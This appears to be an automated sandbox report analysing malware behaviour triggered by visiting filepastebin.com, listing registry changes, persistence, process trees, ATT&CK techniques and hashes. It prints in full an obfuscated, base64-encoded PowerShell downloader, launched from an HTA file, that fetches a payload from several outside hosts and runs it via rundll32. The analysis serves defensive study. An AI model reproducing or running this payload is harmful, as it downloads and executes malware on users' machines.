hxxp://filepastebin[.]com

Analysis

max time kernel
490s
max time network
493s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20/04/2023, 18:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://filepastebin.com

Score

8^/10

persistence

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
125	3952	powershell.exe
128	3952	powershell.exe
130	3952	powershell.exe
133	3952	powershell.exe
136	3952	powershell.exe
139	3952	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	mshta.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133264967204978134"	chrome.exe

Modifies registry class 29 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000b0012c226c45d9011c3637467345d901619a9b25c873d90114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4480	chrome.exe
4480	chrome.exe
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe
5064	chrome.exe
5064	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe
Token: SeShutdownPrivilege	4480	chrome.exe
Token: SeCreatePagefilePrivilege	4480	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe
4480	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1392	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4480 wrote to memory of 3948	4480	chrome.exe	83
PID 4480 wrote to memory of 3948	4480	chrome.exe	83
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2932	4480	chrome.exe	84
PID 4480 wrote to memory of 2808	4480	chrome.exe	85
PID 4480 wrote to memory of 2808	4480	chrome.exe	85
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86
PID 4480 wrote to memory of 2192	4480	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://filepastebin.com
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcdd899758,0x7ffcdd899768,0x7ffcdd899778
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1796 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:2
  2⤵
  PID:2932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1228 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:2192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3048 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:1
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4572 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:1
  2⤵
  PID:3536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:3220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5028 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:3884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:1820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4588 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:8
  2⤵
  PID:460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,5346143795890170745,14940946357129470000,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5064

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1580

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Pwzx\Lktljcnu.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
PID:2012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAYgBhAG4AaQBzAGgAZQBkAEMAbwBmAGYAZQBlAGMAdQBwACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdgBlAGwAZQB5AC4AYwBvAC8ANQB4AHgAawAyAEwALwByADUAVABiAFQAcQAsAGgAdAB0AHAAcwA6AC8ALwBkAHMAdAAuAGMAbwAuAHQAegAvAEEAcwBaAFcAdQBVAGwALwBQAGUAVQBQAFkARABRAEsANgAsAGgAdAB0AHAAcwA6AC8ALwByAGUAZABiAG8AbwBrAC4AYwBsAG8AdQBkAC8AOQBPAEcAegBOAEgALwBSADAAdgBoAEYAMQBIAEEAVgAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABzAGkAbQBwAG8AcgB0AHMALgBzAGgAbwBwAC8AaAByAFMARABoAC8ATwBUAHgAdgBvAFgASwAsAGgAdAB0AHAAcwA6AC8ALwBsAG8AagBhAGwAegAxADQALgBjAG8AbQAuAGIAcgAvADgAagBKADMAYgAvAG0AbgBuAHEASgA2AFYALABoAHQAdABwAHMAOgAvAC8AdQB0AGkAbABpAG0AaQB4AG4AYQB0AGEAbAAuAGMAbwBtAC4AYgByAC8ARABKADkAYwAvAHMAcwB2AFMAYQBvAHQAZAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABxAHUAYQBtAG8AYwBsAGkAdABJAG4AZgBlAHIAcgBlAHIAcwAgAGkAbgAgACQAYgBhAG4AaQBzAGgAZQBkAEMAbwBmAGYAZQBlAGMAdQBwACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABxAHUAYQBtAG8AYwBsAGkAdABJAG4AZgBlAHIAcgBlAHIAcwAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEAOAAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwATgBvAG4AYwBvAG0AcABlAG4AcwBhAHQAbwByAHkALgBFAHIAaQBzAHQAYQBsAGkAcwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAE4AbwBuAGMAbwBtAHAAZQBuAHMAYQB0AG8AcgB5AC4ARQByAGkAcwB0AGEAbABpAHMAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAFEAQQBSAFEAQgBOAEEARgBBAEEAWABBAEIATwBBAEcAOABBAGIAZwBCAGoAQQBHADgAQQBiAFEAQgB3AEEARwBVAEEAYgBnAEIAegBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQQB1AEEARQBVAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAGgAQQBHAHcAQQBhAFEAQgB6AEEAQwB3AEEAVABRAEIAdgBBAEgAUQBBAFoAQQBBADcAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  PID:3952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
82881fabdc08a477bd396a460e09943f

SHA1
c43743d9a2742f728841fe1206fbb8e1f13a1dd7

SHA256
63d28b56ad6df0120f4c4e133f0ab755a925b8f42676a6bfcc9b1fee2b8bb8aa

SHA512
f524041455e2d9f989fb435fc699ecc55def6c86fb76c12ce6a5221644a3c63454cfeeeab7362381e9f159c35401908da1bde87084692606e493ec6654d98093

